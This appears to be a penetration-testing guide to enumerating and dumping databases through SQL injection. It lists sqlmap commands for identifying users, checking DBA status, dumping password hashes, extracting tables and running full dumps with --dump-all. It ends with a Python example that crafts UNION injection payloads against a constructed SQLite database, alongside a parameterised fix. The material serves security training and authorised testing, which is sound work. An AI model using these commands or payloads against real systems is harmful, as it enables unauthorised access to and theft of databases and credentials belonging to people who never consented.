Enumeration & Dumping

Context

This guide details the offensive technique of database enumeration and data dumping through SQL injection, using sqlmap to automate it. Once an injectable parameter has been confirmed, the attacker works from the outside in: the account the application connects as, the databases that account can see, their tables and columns, and finally the rows. Assumed knowledge includes database schemas, writing SQL queries, and crafting HTTP requests. In every command below, <URL> stands for a target URL whose query string already contains the injectable parameter; use -p <param> to name the parameter explicitly, --data for POST bodies, and -r <file> to replay a request captured from a proxy.

Theory

Database Enumeration with SQL Injection

Database enumeration is the process of identifying database structures and entities through SQL injection. Where an application concatenates user input into a SQL statement, an attacker can splice in statements of their own and read the DBMS's own metadata catalog: information_schema on MySQL, PostgreSQL and Microsoft SQL Server, the ALL_* dictionary views on Oracle, sqlite_master on SQLite. The same channel yields the current account, its privileges and, with sufficient rights, other accounts' password hashes.

Sqlmap Enumeration Capabilities

Sqlmap is an open-source tool that automates the detection and exploitation of SQL injection flaws, including database enumeration. Once it has identified an injection point and a working technique (boolean-based blind, time-based blind, error-based, UNION query, stacked queries), it generates the DBMS-specific catalog queries itself and retrieves the results without manual intervention. Which technique is available matters in practice: UNION and error-based injection return whole values per request, while blind techniques recover data one character at a time and are correspondingly slow and noisy.

Data Dumping Techniques

Data dumping refers to extracting database contents and saving them locally. With sqlmap an attacker can retrieve single tables, whole databases or every database the account can read; results are written to sqlmap's output directory (configurable with --output-dir), as CSV by default (--dump-format also accepts HTML and SQLITE). This is usually the stage that turns a demonstrated injection into an actual data exposure, so on an engagement scope it deliberately and dump only what the rules of engagement allow.

Practice

Enumerate Current User

Use the following command to identify the current database user.

sqlmap -u <URL> --current-user

Outcome: The account the application uses to connect to the DBMS is identified (on MySQL this is the value of CURRENT_USER()).

Check DBA Status

Determine if the current user has DBA privileges with this command:

sqlmap -u <URL> --is-dba

Outcome: Whether the current account is a database administrator. DBA rights are a prerequisite for sqlmap's file-system and OS features (--file-read, --file-write, --os-shell), so this check decides whether those are worth attempting.

Retrieve Hostname

To get the database server's hostname, execute:

sqlmap -u <URL> --hostname

Outcome: The hostname of the database server is retrieved, which shows whether the DBMS runs on the web server itself or on a separate backend host.

Enumerate Database Users

List all database users with the following command:

sqlmap -u <URL> --users

Outcome: Database accounts are enumerated, revealing further targets for credential attacks. Reading the account list usually requires elevated rights on the DBMS, so this often fails for a low-privileged application account.

Dump User Passwords

Extract hashed passwords of database users using:

sqlmap -u <URL> --passwords

Outcome: Password hashes of database accounts are dumped; sqlmap offers to run a dictionary attack against the retrieved hashes on the spot. Like --users, this normally requires DBA-level read access to the system tables.

Enumerate User Privileges

Uncover privileges for each database user by running:

sqlmap -u <URL> --privileges

Outcome: Privileges per database account are listed, showing which accounts hold rights (file access, administrative privileges) worth pivoting to.

Enumerate Databases

Use this command to list all databases on the server:

sqlmap -u <URL> --dbs

Outcome: Databases visible to the current account are enumerated, giving a high-level view of the server's data assets. Anything the account cannot see will not appear.

Enumerate Tables

To list tables in a specific database, use:

sqlmap -u <URL> -D <database> --tables

Outcome: Tables within the specified database are identified.

Enumerate Columns

Identify columns in a specific table with:

sqlmap -u <URL> -D <database> -T <table> --columns

Outcome: Columns within the specified table are listed, aiding targeted data extraction.

Dump Table Data

Extract all data from a specific table using this command (add -C <col1,col2> to limit the columns, --where to filter rows, or --start/--stop to fetch a range of entries when the table is large):

sqlmap -u <URL> -D <database> -T <table> --dump

Outcome: Data from the specified table is dumped and saved under sqlmap's output directory.

Full Database Dump

For extracting all data from all databases, execute:

sqlmap -u <URL> --dump-all

Outcome: Every table in every database the account can read is dumped. This is the slowest and noisiest option, especially over blind injection; combine it with --exclude-sysdbs to avoid pulling information_schema and similar system databases.

Enumerate Database Schema

Retrieve the database schema with:

sqlmap -u <URL> --schema

Outcome: Databases, tables and columns are listed in one pass, giving the structural layout without any row data; this is typically the step before a targeted --dump.

Count Records in Table

Count records in a specific table using:

sqlmap -u <URL> -D <database> -T <table> --count

Outcome: The record count in the specified table is retrieved without dumping it, which is the quickest way to decide whether a full dump is feasible.

Search for Column, Table or Database Names

--search looks for names, not for cell contents: combined with -C it finds columns whose name matches <column> in any table, with -T it matches table names, and with -D database names. sqlmap prompts whether to match exactly or with a LIKE wildcard. Supplying -D and -T alongside -C restricts the column search to that database and table:

sqlmap -u <URL> --search -C <column> -T <table> -D <database>

Outcome: Matching column, table or database names are listed. Searching for fragments such as pass or token is a fast way to locate credential-bearing columns before dumping.

Use Pivot Column

sqlmap normally walks a table by paging through its rows. Where that is not possible, for instance on DBMSes where it cannot page with LIMIT/OFFSET (Microsoft SQL Server and Sybase are the usual cases), it falls back to pivoting: it fetches the distinct values of one column and then retrieves the remaining columns of each row keyed on that value. sqlmap tries to pick the pivot column itself; --pivot-column overrides that choice. The column must hold unique values, typically the primary key or an ID column:

sqlmap -u <URL> -D <database> -T <table> --dump --pivot-column=<column>

Outcome: The table is dumped row by row using the pivot column as the key. A non-unique pivot column yields missing or duplicated rows.

Exclude System Databases

--exclude-sysdbs is a modifier for the table-enumerating options (--tables without -D, --schema, --dump-all, --search) rather than a command on its own. It skips the DBMS system databases when enumerating tables:

sqlmap -u <URL> --schema --exclude-sysdbs

Outcome: information_schema, mysql, performance_schema and their equivalents on other DBMSes are ignored, keeping the enumeration focused on application data.
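The Theory section describes reading the DBMS catalog through an injectable query, and the Practice section lists the sqlmap options that do it. The following is an added example, not code from this page or from the sqlmap project: against a constructed in-memory SQLite database it issues by hand the UNION-based catalog queries that correspond to --tables, --columns, --count, --search -C and --dump, and shows the parameterised form of the same endpoint that defeats them. The schema, row data and the vulnerable_lookup endpoint are all assumptions made for the example. SQLite has no accounts, so --current-user, --users and --passwords have no equivalent here; on MySQL sqlmap reads those from mysql.user and the catalog from information_schema rather than sqlite_master.

```python
import sqlite3

# Constructed sample database standing in for the backend of a vulnerable
# web application. The hashes are MD5 of well-known weak passwords, chosen
# only so the dumped data resembles a real password_hash column.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY, username TEXT, email TEXT, password_hash TEXT);
CREATE TABLE orders (id INTEGER PRIMARY KEY, user_id INTEGER, total REAL);
INSERT INTO users VALUES (1, 'alice', 'alice@example.test',
                          '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'bob', 'bob@example.test',
                          'e10adc3949ba59abbe56e057f20f883e');
INSERT INTO orders VALUES (10, 1, 42.5);
INSERT INTO orders VALUES (11, 2, 9.99);
"""

conn = sqlite3.connect(":memory:")
conn.executescript(SCHEMA)


def vulnerable_lookup(username: str) -> list:
    """The injectable endpoint (assumed): user input is concatenated into the
    SQL text. It selects three columns, which fixes the shape every UNION
    payload has to match."""
    sql = f"SELECT id, username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def safe_lookup(username: str) -> list:
    """Hardened form of the same endpoint: a bound parameter is data, never SQL."""
    sql = "SELECT id, username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def build_payload(select_expr: str, tail: str) -> str:
    """UNION payload. 'x' matches no real user, so only injected rows come
    back; UNION ALL preserves the source's row order; '-- ' comments out the
    application's closing quote."""
    return f"x' UNION ALL SELECT NULL, {select_expr}, NULL FROM {tail}-- "


def inject(select_expr: str, tail: str) -> list:
    """Send the payload and return whatever landed in the text column (index 1)."""
    return [row[1] for row in vulnerable_lookup(build_payload(select_expr, tail))]


def enumerate_tables() -> list:
    """--tables: read table names from the catalog (sqlite_master here)."""
    return inject("name", "sqlite_master WHERE type = 'table'")


def enumerate_columns(table: str) -> list:
    """--columns: column names in catalog order via the pragma_table_info()
    table-valued function (SQLite 3.16+)."""
    return inject("name", f"pragma_table_info('{table}')")


def count_rows(table: str) -> int:
    """--count: row count without dumping the table."""
    return int(inject("CAST(COUNT(*) AS TEXT)", table)[0])


def search_columns(fragment: str) -> list:
    """--search -C <fragment>: LIKE-style match on column names across all
    tables. Returns (table, column) pairs."""
    hits = []
    for table in enumerate_tables():
        for col in enumerate_columns(table):
            if fragment.lower() in col.lower():
                hits.append((table, col))
    return hits


def dump_table(table: str) -> list:
    """--dump: the UNION gives one text slot per row, so concatenate every
    column into it with a separator and split on the client side."""
    cols = enumerate_columns(table)
    sep = "|"
    expr = f" || '{sep}' || ".join(f"IFNULL(CAST({c} AS TEXT), 'NULL')" for c in cols)
    return [row.split(sep) for row in inject(expr, table)]


if __name__ == "__main__":
    for table in enumerate_tables():
        print(table, enumerate_columns(table), count_rows(table))
    print("credential columns:", search_columns("pass"))
    for row in dump_table("users"):
        print(row)
    print("same payload, parameterised endpoint:",
          safe_lookup(build_payload("name", "sqlite_master")))
```

Each request returns whole rows because UNION injection is available; when only a blind technique works, sqlmap runs the same catalog queries but recovers every character through a sequence of true/false or timing probes, which is why --count before --dump is worth the extra request.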

Tools

  • sqlmap

Sqlmap streamlines SQL injection identification and exploitation, offering a robust suite of features for automated database enumeration and data dumping.
